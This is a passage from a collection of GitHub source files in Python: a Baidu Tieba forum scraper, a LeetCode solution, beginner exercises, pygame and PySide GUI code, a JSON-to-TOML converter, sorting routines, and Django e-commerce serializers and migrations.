'YYYY-MM-DD').replace(tzinfo=dateutil.tz.gettz(tz)).timestamp \n except ValueError:\n d=str(int(d)-1)\n last_reply_at=deal_dayErr(m,d,tz)\n return last_reply_at\n \ndef parser_time(_time):\n tz = 'Asia/Hong_Kong'\n #tz = 'Asia/BeiJing'\n if _time.find(':') >0:\n last_reply_at = arrow.get(arrow.now().format('YYYY-MM-DD')+' '+_time,'YYYY-MM-DD HH:mm').replace(tzinfo=dateutil.tz.gettz(tz)).timestamp\n elif _time.find('-') >0:\n m,d = _time.split('-')\n if len(m) == 1:\n m = '0'+m\n if len(d) == 1:\n d = '0'+d\n last_reply_at=deal_dayErr(m,d,tz)\n else:\n last_reply_at = parser_time('1970-01-01 00:00')\n if last_reply_at > int(time.time()):\n last_reply_at-=(365*24*3600)\n return last_reply_at*1000\n\n\nasync def item_perk(tie_list):\n try:\n #rcli=redis.StrictRedis(connection_pool=pool)\n #for tie in tie_list:\n #if tie and len(tie.keys()):\n #rcli.rpush('tie2es_list',tie)\n #db.tieba_undeal_ties.update({'_id':tie['id']},tie,True)\n async with ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:\n async with session.post('http://59.110.52.213/stq/api/v1/pa/baidutieba/add',headers={'Content-Type':'application/json'},data=json.dumps(tie_list)):\n pass\n # text=await res.text()\n # return text\n #requests.post('http://59.110.52.213/stq/api/v1/pa/baidutieba/add',headers={'Content-Type':'application/json'},data=json.dumps(tie_list))\n print(tie_list[0]['id'],'_This post has been completion information and deposited in the redis, ready to push the Elasticsearch!')\n except:\n traceback.print_exc()\n\n\n\nasync def parserAndStorage_ties(tie,db):\n #rcli = redis.StrictRedis(connection_pool=pool)\n try:\n if tie and len(tie.keys()):\n tie_list=[]\n ba_name=tie['ba_name']\n tie=tie['tie']\n data_field=json.loads(tie.get('data-field'))\n last_reply=tie.select_one('div.t_con div.j_threadlist_li_right div.threadlist_detail div.threadlist_author span.threadlist_reply_date')\n authpr_info=tie.select('span.tb_icon_author')\n tie_url='http://tieba.baidu.com'+tie.select('div.threadlist_title a.j_th_tit')[0].get('href').split('?')[0]\n author_name=data_field['author_name'] if data_field['author_name'] else 'unkown'\n tiezi={\n 'tieba_id':remove_emoji(ba_name),\n 'author_name':remove_emoji(author_name),\n 'reply_num':data_field['reply_num'],\n 'id':str(data_field['id']),\n 'title':remove_emoji(tie.select_one('div.threadlist_title a.j_th_tit').get('title')),\n 'tie_url':tie_url.split('?')[0],\n 'author_id':str(json.loads(tie.select_one('span.tb_icon_author').get('data-field'))['user_id']) if len(authpr_info) else '',\n 'last_reply_at':parser_time(last_reply.text.strip()) if last_reply else parser_time('00:00'),\n 'date':parser_time('00:00'),\n 'content':'',\n 'author_id':'',\n 'created_at':int(time.time()*1000)\n }\n tieFlag=await myUtils.tieInfo_fetch(tiezi,db)\n return tieFlag\n\n except:\n traceback.print_exc()\n return True\n\n\n\ndef tiebaInfo_fetch(bs,name):\n #rcli = redis.StrictRedis(connection_pool=pool)\n today=time.strftime(\"%Y-%m-%d\",time.localtime())\n version=time.mktime(time.strptime(today,\"%Y-%m-%d\"))#datetime.datetime.strptime(today,\"%Y-%m-%d\")\n spans=bs.select('span.red_text')\n ba_t_num=int(spans[0].text if len(spans) else 0)\n ba_m_num=int(spans[1].text if len(spans) else 0)\n ba_p_num=int(spans[2].text if len(spans) else 0)\n return {'id':(name+'_'+today),'ba_t_num':ba_t_num,'ba_m_num':ba_m_num,'ba_p_num':ba_p_num,'ba_name':name,'version':version}\n\n\n \n\ndef fetch_tiezi(pool,db1,db2):\n print('start fetch_tiezi')\n rcli = redis.StrictRedis(connection_pool=pool)\n while True:\n try:\n if db1.client.is_primary :\n db=db1\n else :\n db = db2\n item = eval(rcli.brpoplpush('tieba_url_list','tieba_url_list',0).decode())\n ba_name=item['name']\n name_urlcode=quote(ba_name) if not ba_name.endswith('吧') else quote(ba_name[0:-1])\n tiebaInfo={}\n pnum=0\n #max_page=50\n isContinue=True\n url='http://tieba.baidu.com/f?kw={name}'.format(name=name_urlcode)\n noNPC=0\n while isContinue:#pnum<=max_page and isContinue:\n #url='http://tieba.baidu.com/f?kw={name}&pn={pnum}'.format(name=name_urlcode,pnum=pnum)\n res=requests.get(url,timeout=30)\n try:\n bs=BeautifulSoup(res.content.decode('utf-8'), 'html.parser')\n except UnicodeDecodeError:\n bs=BeautifulSoup(res.text, 'html.parser')\n #ties=bs.select('li[data-field]')\n if pnum==0:\n tiebaInfo=tiebaInfo_fetch(bs,ba_name)\n db.tiebaInfo.update({'_id':tiebaInfo['id']},tiebaInfo,True)\n del tiebaInfo['id']\n del tiebaInfo['version']\n del tiebaInfo['ba_name']\n ties=bs.select('li.j_thread_list.clearfix')\n if not len(ties):\n break\n #ties=bs.select('li[data-field]')\n tasks=list(asyncio.ensure_future(parserAndStorage_ties({'ba_name':ba_name,'tie':tie},db)) for tie in ties)\n print('tasks:',len(tasks))\n loop=asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait(tasks))\n #print(len(ties))\n \n #print(ties['ties'][0])\n #print('Post information is caught, wait to parse!')\n created_at=rcli.hget('tieba_created_at_hash',ba_name)\n tie_list=[]\n for task in tasks:\n tiezi=task.result()\n fullTie=dict(tiebaInfo,**tiezi,**esheader)\n #print(remove_emoji(json.dumps(fullTie)))\n if created_at and fullTie['last_reply_at'] < int(created_at) - (30*24*3600*1000):\n #item_perk(tie_list,pool)\n isContinue=False\n #break\n elif fullTie['last_reply_at'] < int(time.mktime(time.strptime('2017-01-01','%Y-%m-%d')))*1000:\n isContinue=False\n #break\n else:\n #item_perk([fullTie])\n tie_list.append(fullTie)\n print(time.strftime(\"%Y-%m-%d\",time.localtime(fullTie['last_reply_at']/1000)))\n tasks=list(asyncio.ensure_future(item_perk([tie])) for tie in tie_list)\n loop=asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait(tasks))\n print(isContinue) \n if isContinue:\n # _next=bs.select_one('div#frs_list_pager a.next')\n # _last=bs.select_one('div#frs_list_pager a.last')\n _next=bs.select_one('div#frs_list_pager span.pagination-current.pagination-item + a')\n if not (_next) and noNPC<5:\n print('_page:',_next)\n noNPC+=1\n elif noNPC>=5:\n break\n #max_page=int(re.findall(r'\\d+',_next['href'])[-1])\n url='http:'+_next['href'] if _next else '{}pn={}'.format(url.split('pn=')[0],pnum+50)\n print(url)\n #pnum+=50\n pnum=int(re.findall(r'\\d+',url)[-1])\n else:\n break\n \n rcli.hset('tieba_created_at_hash',ba_name,int(time.mktime(datetime.date.today().timetuple()))*1000)\n except:\n traceback.print_exc()\n","repo_name":"Arrow-Dark/baidutieba","sub_path":"tiezi_fetch.py","file_name":"tiezi_fetch.py","file_ext":"py","file_size_in_byte":9091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73431820327","text":"#using a sliding windo in theory, doing a prefix mulitplicaiton before the index\n#and setting the result array to prefix multiplication, then calculating a postfix\n#product and mulitplying it to answer array which gets us everyting but the index in\n#multiplication!, and sends out that reusltant answer array\n\nclass Solution(object):\n def productExceptSelf(self, nums):\n answer = [1] * len(nums)\n prefix = 1\n for i in range(len(nums)):\n answer[i] = prefix\n prefix *= nums[i]\n postfix =1\n for i in range(len(nums)-1,-1,-1):\n answer[i] *= postfix\n postfix *= nums[i]\n return answer\n\n ","repo_name":"pbairol/leetcode","sub_path":"Product of Array Except itself 238/product_array_2-238.py","file_name":"product_array_2-238.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1916669425","text":"#DayDayUp\n#dayfactor=0.005\n#dayup=pow(1+dayfactor,365)\n#daydown=pow(1-dayfactor,365)\n#print(\"dayup is {:.5f},daydown is {:.5f}\".format(dayup,daydown))\n\n\n#dayup=1.0\n#dayfactor=0.01\n#for i in range(365):\n# if i % 7 in [6,0]:\n# dayup*=(1-dayfactor)\n# else:\n# dayup*=(1+dayfactor)\n#print(\"dayup is {:.5f}\".format(dayup))\n\n\ndef dayup(dayfactor):\n dayup=1.0\n for i in range(365):\n if i % 7 in [6,0]:\n dayup*=(1-dayfactor)\n else:\n dayup*=(1+dayfactor)\n return dayup\n\ndayfactor=0.01\nwhile dayup(dayfactor) < pow(1.01,365):\n dayfactor+=0.0001\nprint(\"{:.4f}\".format(dayfactor))\n\n","repo_name":"Charlie-Wilson0211/Python-Learning-Note","sub_path":"DayDayUp.py","file_name":"DayDayUp.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3886384269","text":"import pygame\n\n# screen size is defined here\ndisplay_width = 1350\ndisplay_height = 900\n\n\n# Initilaizes the pygame module and creates the canvas\nclass pygame_starter():\n def __init__(self):\n pygame.init()\n self.game_display = pygame.display.set_mode((display_width, display_height)) # display canvas\n pygame.display.set_caption(\"Blackjack\") # display header caption\n\n\n# Class that handles placing text on screen\nclass pygame_text():\n # creates a text object using text, fontsize and coordinates\n def __init__(self, text, size=20, x_coord=0, y_coord=0):\n self.text = text\n self.size = size\n self.x_coord = x_coord\n self.y_coord = y_coord\n\n # Text of the object can be changed, with set_text\n def set_text(self, text):\n self.text = text\n\n # Text size can be changed\n def set_size(self, size):\n self.size = size\n\n # Text location can be changed, useful for animation\n def set_location(self, x_coord, y_coord):\n self.x_coord = x_coord\n self.y_coord = y_coord\n\n # Displays the object on to our display object\n def display(self, current_display_object):\n diplayed_text = pygame.font.Font(\"freesansbold.ttf\", self.size) # Font and size\n # Created a surface and a rectangle for the text\n text_surface, text_rectangle = text_objects(self.text, diplayed_text)\n # centers the text rectangle\n text_rectangle.center = (self.x_coord, self.y_coord)\n # puts the text onto the current display object\n current_display_object.blit(text_surface, text_rectangle)\n\n\n# creates a text object with text and font\ndef text_objects(text, font):\n text_surface = font.render(text, True, (255, 255, 255)) # creates a text surface where the text is\n return text_surface, text_surface.get_rect() # returns the text surface with its rectangle\n\n\n# Class for buttons\nclass button(object):\n def __init__(self, text, font_size, x_coord, y_coord, width, height, inactive_color, active_color, action=None):\n self.text = text\n self.font_size = font_size\n self.x_coord = x_coord\n self.y_coord = y_coord\n self.width = width\n self.height = height\n self.active = active_color\n self.inactive = inactive_color\n self.action = action\n\n # function that displays the button\n def display_button(self, current_display_object):\n # tracks mouse movement and clicks\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n # if mouse is over the button, it will light up and use active color instead of inactive\n if self.x_coord + self.width > mouse[0] > self.x_coord and self.y_coord + self.height > mouse[1] > self.y_coord:\n pygame.draw.rect(current_display_object, self.active, (self.x_coord, self.y_coord, self.width, self.height))\n\n if click[0] == 1:\n return \"close\"\n # if is clicked, will run the action\n if click[0] == 1 and self.action != None:\n self.action()\n return True\n else:\n pygame.draw.rect(current_display_object, self.inactive,\n (self.x_coord, self.y_coord, self.width, self.height))\n\n # creates a text object for the button using pygame_text class that we created\n text = pygame_text(self.text, self.font_size, self.x_coord + self.width / 2, self.y_coord + self.height / 2)\n # Displays the text onto our display object\n text.display(current_display_object)\n","repo_name":"KristerL/UT_BLACKJACK","sub_path":"pygame_handler.py","file_name":"pygame_handler.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5973245853","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 6 15:45:38 2018\n\n@author: vpapg\n\"\"\"\n\n# Write a for loop to print out the characters of a string, one per line.\n\ns = 'Sorry seems to be the hardest word'\n\nfor ch in s:\n print(ch)","repo_name":"vpapg/NLTK_book_py3","sub_path":"Ch03/ex12.py","file_name":"ex12.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70093323047","text":"# Author: Kaan Eraslan\n\nfrom PySide2 import QtWidgets\nfrom tutorials.utils.window import GLWindow as AppWindow\nfrom glevents import EventsGL\nimport sys\n\n\nclass EventAppWindow(AppWindow):\n \"Overriding base class with event methods\"\n\n def __init__(self,\n glwidget: QtWidgets.QOpenGLWidget,\n parent=None,\n ):\n super().__init__(glwidget,\n parent)\n self.camX.setRange(-520.0, 520.0)\n self.camY.setRange(-520.0, 520.0)\n self.xSlider.setRange(-180.0, 180.0)\n self.ySlider.setRange(-180.0, 180.0)\n self.zSlider.setRange(-180.0, 180.0)\n self.upBtn.clicked.connect(self.moveCameraForward)\n self.downBtn.clicked.connect(self.moveCameraBackward)\n self.leftBtn.clicked.connect(self.moveCameraLeft)\n self.rightBtn.clicked.connect(self.moveCameraRight)\n self.camX.valueChanged.connect(self.turnCameraX)\n self.camY.valueChanged.connect(self.turnCameraY)\n self.xSlider.valueChanged.connect(self.rotateCubes)\n self.ySlider.valueChanged.connect(self.rotateCubes)\n self.zSlider.valueChanged.connect(self.rotateCubes)\n #\n self.lastCamXVal = self.camX.value()\n #\n self.lastCamYVal = self.camY.value()\n\n def moveGLCamera(self, direction: str):\n self.glWidget.moveCamera(direction)\n\n def moveCameraForward(self):\n self.moveGLCamera(\"forward\")\n\n def moveCameraBackward(self):\n self.moveGLCamera(\"backward\")\n\n def moveCameraLeft(self):\n self.moveGLCamera(\"left\")\n\n def moveCameraRight(self):\n self.moveGLCamera(\"right\")\n\n def turnCameraX(self, newVal: int):\n \"Turn camera around\"\n offsetx = newVal - self.lastCamXVal\n valy = self.camY.value() - self.lastCamYVal\n self.glWidget.turnAround(x=float(offsetx),\n y=float(valy))\n self.lastCamXVal = newVal\n\n def turnCameraY(self, newVal: int):\n \"Turn camera around\"\n offsety = newVal - self.lastCamYVal\n valx = self.camX.value() - self.lastCamXVal\n self.glWidget.turnAround(x=float(valx),\n y=float(offsety))\n self.lastCamYVal = newVal\n\n def rotateCubes(self):\n rx = self.xSlider.value()\n ry = self.ySlider.value()\n rz = self.zSlider.value()\n self.glWidget.rotateCubes(rx, ry, rz)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n window = EventAppWindow(EventsGL)\n window.show()\n res = app.exec_()\n sys.exit(res)\n","repo_name":"D-K-E/pyside-opengl-tutorials","sub_path":"tutorials/06-events/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"71485929769","text":"import numpy as np, cv2\n\nimage = np.zeros((300, 400), np.uint8) #300행 400열의 행렬 생성\nimage[:] = 100 # 회색(100)바탕 영상 생성\n\ntitle= 'Window' #title 변수에 'Window'라는 윈도우 이름 할당\ncv2.namedWindow(title, cv2.WINDOW_AUTOSIZE) #크기 재조정 불가능한 윈도우 생성\ncv2.imshow(title, image)\ncv2.resizeWindow(title, 500, 600)\ncv2.imshow(title, image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"DAASHeo/2022_Machine_Vision","sub_path":"Unit4/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26438443050","text":"def find_two_smallest(L):\n \"\"\"리스트 L에서 가장 작은 두 값의 인덱스를 튜플로 반환한다.\n\n >>> counts = [809, 834, 477, 478, 307, 122, 96, 102, 324, 476]\n >>> find_two_smallest(counts)\n (6, 7)\n \"\"\"\n\n # 리스트 맨 앞에 가장 작은 두 수가 오도록 리스트를 정렬한 복사본을 구한다.\n sorted_L = sorted(L)\n\n # 원래 리스트 L에서 두 수의 인덱스를 구한다.\n fir_min_ind = L.index(sorted_L[0])\n sec_min_ind = L.index(sorted_L[1])\n\n return fir_min_ind, sec_min_ind\n\n","repo_name":"icymint8/2023comgaesil","sub_path":"2023-05-16 알고리즘/sort_then_find.py","file_name":"sort_then_find.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936769336","text":"num_dragons = int(input())\nall_dragons = {}\n\nfor _ in range(1, num_dragons + 1):\n arg_1, arg_2, arg_3, arg_4, arg_5 = input().split(\" \")\n dragon_type, dragon_name = arg_1, arg_2\n\n if arg_3.isdigit():\n damage = int(arg_3)\n else:\n damage = 45\n\n if arg_4.isdigit():\n health = int(arg_4)\n else:\n health = 250\n\n if arg_5.isdigit():\n armor = int(arg_5)\n else:\n armor = 10\n\n if dragon_type not in all_dragons:\n all_dragons[dragon_type] = [(dragon_name, damage, health, armor)]\n else:\n for item in all_dragons[dragon_type]:\n if item[0] == dragon_name:\n idx_item = all_dragons[dragon_type].index(item)\n all_dragons[dragon_type][idx_item] = (dragon_name, damage, health, armor)\n break\n else:\n all_dragons[dragon_type].append((dragon_name, damage, health, armor))\n\nfor key, value in all_dragons.items():\n value.sort()\n\n ave_damage = sum(i[1] for i in value)/len(value)\n ave_health = sum(i[2] for i in value)/len(value)\n ave_armour = sum(i[3] for i in value)/len(value)\n print(f\"{key}::({ave_damage:.2f}/{ave_health:.2f}/{ave_armour:.2f})\")\n\n for i in value:\n print(f\"-{i[0]} -> damage: {i[1]}, health: {i[2]}, armor: {i[3]}\")\n","repo_name":"Polishko/SoftUni","sub_path":"Python Fundamentals/More Exercises/More_exercises_6/qu_5.py","file_name":"qu_5.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"462950386","text":"# Mathilde HAVARD-SEDENO\n# M2 ORO\n\nimport math, robot, tools, pathPlanning\nimport numpy as np\nfrom matplotlib import pyplot\n\ndef pathFollowing(r, commands, loop=False):\n\n print(\"\\n\\t\\t###########################################\")\n print(\"\\t\\t ############## PATH FOLLOWING ###############\")\n print(\"\\t\\t #############################################\\n\")\n\n print(\" Launching the path following procedure...\")\n\n # We go to the first pose\n r.actuate(commands[0])\n # and start drawing\n r.pen_down()\n\n # then we go through all the poses\n for (x,y) in commands:\n r.actuate([x,y])\n\n # if we want the drawing to go back to the first pose -- as in a circle for instance --\n if loop==True:\n r.actuate(commands[0])\n\n r.pen_up()\n input(\"Press [ENTER] to continue ...\")\n\n # and to the initial position\n r.go_home()\n","repo_name":"mHavardSedeno/src","sub_path":"pathFollowing.py","file_name":"pathFollowing.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72182063208","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ndef checkParenthesis(sentence):\r\n stack = []\r\n for i in sentence:\r\n if i == '(' or i == '[':\r\n stack.append(i)\r\n elif (i == ')' or i == ']') and len(stack) == 0:\r\n return False\r\n elif i == ')' and stack.pop() != '(':\r\n return False\r\n elif i == ']' and stack.pop() != '[':\r\n return False\r\n \r\n if len(stack) == 0:\r\n return True\r\n else:\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n while True:\r\n # get sentence\r\n sentence = input().rstrip()\r\n while sentence[-1] != \".\":\r\n sentence += input().rstrip()\r\n\r\n # if sentence is end, exit program\r\n if sentence == \".\":\r\n break\r\n \r\n if checkParenthesis(sentence):\r\n print(\"yes\")\r\n else:\r\n print(\"no\")\r\n","repo_name":"yerim10044001/ProblemSolving","sub_path":"백준/Silver/4949. 균형잡힌 세상/균형잡힌 세상.py","file_name":"균형잡힌 세상.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5238434696","text":"\"\"\"\nEXERCÍCIO 091: Jogo de Dados em Python\n\nCrie um programa onde 4 jogadores joguem um dado e tenham resultados aleatórios. \n Guarde esses resultados em um dicionário. \n\nNo final, coloque esse dicionário em ordem, sabendo que o vencedor tirou o maior número no dado.\n\"\"\"\n\nfrom random import randint\nfrom time import sleep\nfrom operator import itemgetter\n\njogadas = dict()\nranking = dict()\n\nprint('VALORES SORTEADOS:')\n\nfor i in range(1, 5):\n valor = randint(1, 6)\n jogadas[f'Jogador_{i}'] = valor\n\n print(f'Jogador_{i} tirou {valor} no dado.')\n\n sleep(1)\n\nprint('-=' * 15)\nprint('== RANKING DOS JOGADORES ==')\n\nranking = sorted(jogadas.items(), key=itemgetter(1), reverse=True)\n\nfor i, v in enumerate(ranking):\n print(f'{i + 1}° lugar: {v[0]} com {v[1]}.')\n sleep(1)","repo_name":"bruno-gs/Python","sub_path":"Curso em video/Estruturas Compostas - M3/DICIONÁRIOS/ex091.py","file_name":"ex091.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16012339364","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport sys\nimport getopt\nimport toml\nimport json\ndef main(argv):\n inputfile = ''\n outputfile = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n print('json2toml.py -i -o ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('json2toml.py -i -o ')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n print(inputfile)\n print(outputfile)\n obj = json.load(open(inputfile, \"r\"))\n toml.dump(obj, open(outputfile, \"w\"))\n \nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"Miachol/configr","sub_path":"inst/extdata/json2toml.py","file_name":"json2toml.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"27463155511","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n max_len = len(s)\n\n while max_len > 1:\n for i in range(0, len(s)-max_len + 1):\n substring = s[i: i + max_len]\n if substring == substring[::-1]:\n return substring\n max_len -= 1\n return (s[0] if s else '')\n\n\n","repo_name":"chen-qian-dan/LeetCode_Python","sub_path":"lc_05_Longest Palindromic Substring/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14031409810","text":"# DEDICATING TO SORTED ALGORITHMS\n\n'''Selection sort what is the runtime and inefficiences you see with the sorting algorithm after you implement it'''\n\n# [3,44,38,5,47,15,36,26,27,2,46,4,19,50,48]\ndef selection_sort(unsorted_arr):\n counter = 0 # Marking the number of iterations we have to go through\n wall = 0 # Represents all sorted elements up to that wall\n\n for index in range(0, len(unsorted_arr)): # For every element compare it to the rest of the elements have to draw a grid to analyze run time\n wall = index\n for inner_index in range(index + 1, len(unsorted_arr)): # current element to all elements after the sorted pile\n compared_element = unsorted_arr[inner_index] # Represents the unsorted element we are comparing the current element to\n\n # If we find a new current minimum while comparing then update the current minimum\n if compared_element < unsorted_arr[wall]: \n wall = inner_index\n # If or once we find the new current minimum we replace it with the element at the wall and start the next while loop iteration at wall + 1\n\n\n unsorted_arr[index], unsorted_arr[wall] = unsorted_arr[wall], unsorted_arr[index] # Make the swap and update wall for next while loop iteration\n\n return unsorted_arr\n\n# def selection_sort(A):\n\n# for i in range(len(A)):\n\n# wall = i # Set the wall at the current element \n# for compared_index in range(wall + 1, len(A)): # For the unsorted elements that occur after the wall just looking for a new minimum\n# print(compared_index,wall)\n# if A[compared_index] < A[wall]: # If the compared element we are on is bigger than the element at the wall we set the wall to be at that lower value index\n# wall = compared_index # Setting the wall at the newly found minimum\n\n# # Swap the found minimum element with\n# # the first element\n# A[i], A[wall] = A[wall], A[i]\n# print(A)\n# return A\n\n\n# print(selection_sort([29,10,14,37,14]))\n\n\n# [29,10,14,37,14\n\ndef insertion_sort(unsorted_arr):\n for index in range(1, len(unsorted_arr)): # For every element compare to the element behind it\n current_num = unsorted_arr[index]\n backtracing_index = index - 1 # Marks the element previous\n \n while current_num < unsorted_arr[backtracing_index]: # while the current element is less than the elements before it\n unsorted_arr[backtracing_index + 1] = unsorted_arr[backtracing_index] \n backtracing_index -= 1\n unsorted_arr[backtracing_index+1] = current_num \n return unsorted_arr\n # It is only swapping pairs\n\nprint(insertion_sort([3,38,44,5,47,15,36,26,27,2,46,4,19,50,48]))\n ","repo_name":"matthewharrilal/CS-Questions-GRIND","sub_path":"day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5426586742","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers, validators\n\nfrom .models import Cart, Category, Product, Product_Comment, Tag, Transaction, Wishlist\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = \"__all__\"\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = \"__all__\"\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n tag = TagSerializer(read_only=True, many=True)\n category = CategorySerializer(\"\")\n sellerName = serializers.CharField(source=\"seller.username\", read_only=True)\n\n class Meta:\n model = Product\n fields = \"__all__\"\n\n\nclass TransactionSerializer(serializers.ModelSerializer):\n buyerName = serializers.CharField(source=\"buyer.username\", read_only=True)\n sellerName = serializers.CharField(source=\"seller.username\", read_only=True)\n productName = serializers.CharField(source=\"product.name\", read_only=True)\n\n class Meta:\n model = Transaction\n fields = [\n \"id\",\n \"buyer\",\n \"seller\",\n \"product\",\n \"date\",\n \"buyerName\",\n \"sellerName\",\n \"productName\",\n ]\n\n\nclass ProductCommentSerializer(serializers.ModelSerializer):\n buyerName = serializers.CharField(source=\"buyer.username\", read_only=True)\n\n class Meta:\n model = Product_Comment\n fields = [\"id\", \"buyer\", \"comment\", \"rating\", \"buyerName\"]\n\n\nclass RegisterSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\"username\", \"password\", \"email\")\n extra_kwargs = {\n \"password\": {\"write_only\": True},\n \"username\": {\n \"required\": True,\n \"allow_blank\": False,\n \"validators\": [\n validators.UniqueValidator(\n User.objects.all(), f\"A user with that username already exists.\"\n )\n ],\n },\n }\n\n def create(self, validated_data):\n user = User.objects.create_user(\n username=validated_data[\"username\"],\n email=validated_data[\"email\"],\n password=validated_data[\"password\"],\n )\n return user\n\n\nclass WishlistSerializer(serializers.ModelSerializer):\n productName = serializers.CharField(source=\"product.name\", read_only=True)\n userName = serializers.CharField(source=\"user.username\", read_only=True)\n image = serializers.ImageField(source=\"product.image\", read_only=True)\n price = serializers.DecimalField(\n max_digits=7, decimal_places=0, source=\"product.price\", read_only=True\n )\n\n class Meta:\n model = Wishlist\n fields = \"__all__\"\n\n\nclass CartSerializer(serializers.ModelSerializer):\n productName = serializers.CharField(source=\"product.name\", read_only=True)\n userName = serializers.CharField(source=\"user.username\", read_only=True)\n seller = serializers.CharField(source=\"product.seller.id\", read_only=True)\n image = serializers.ImageField(source=\"product.image\", read_only=True)\n price = serializers.DecimalField(\n max_digits=7, decimal_places=0, source=\"product.price\", read_only=True\n )\n print(seller)\n\n class Meta:\n model = Cart\n fields = \"__all__\"\n","repo_name":"Bosh-Kuo/Database-2022-Fall","sub_path":"e_commerce_backend/app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29583002002","text":"from __future__ import unicode_literals\n\nimport apps.models\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"log_extract\", \"0016_tasks_ex_data\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"ExtractLink\",\n fields=[\n (\"link_id\", models.AutoField(primary_key=True, serialize=False, verbose_name=\"链路id\")),\n (\n \"link_type\",\n models.CharField(\n choices=[(\"common\", \"内网链路\"), (\"qcloud_cos\", \"腾讯云cos链路\")],\n default=\"common\",\n max_length=20,\n verbose_name=\"链路类型\",\n ),\n ),\n (\"operator\", models.CharField(max_length=255, verbose_name=\"执行人\")),\n (\"op_bk_biz_id\", models.IntegerField(verbose_name=\"执行bk_biz_id\")),\n (\n \"qcloud_secret_id\",\n apps.models.EncryptionField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", null=True, verbose_name=\"腾讯云SecretId\"\n ),\n ),\n (\n \"qcloud_secret_key\",\n apps.models.EncryptionField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", null=True, verbose_name=\"腾讯云SecretKey\"\n ),\n ),\n (\n \"qcloud_cos_bucket\",\n models.CharField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", max_length=255, verbose_name=\"腾讯云Cos桶名称\"\n ),\n ),\n (\n \"qcloud_cos_region\",\n models.CharField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", max_length=255, verbose_name=\"腾讯云Cos区域\"\n ),\n ),\n (\"is_enable\", models.BooleanField(default=True, verbose_name=\"是否启用\")),\n ],\n options={\n \"verbose_name\": \"提取链路\",\n \"verbose_name_plural\": \"提取链路\",\n },\n ),\n migrations.CreateModel(\n name=\"ExtractLinkHost\",\n fields=[\n (\"id\", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name=\"ID\")),\n (\"target_dir\", models.CharField(default=\"\", max_length=255, verbose_name=\"挂载目录\")),\n (\"bk_cloud_id\", models.IntegerField(verbose_name=\"主机云区域id\")),\n (\"ip\", models.GenericIPAddressField(verbose_name=\"主机ip\")),\n (\"link\", models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\"log_extract.ExtractLink\")),\n ],\n 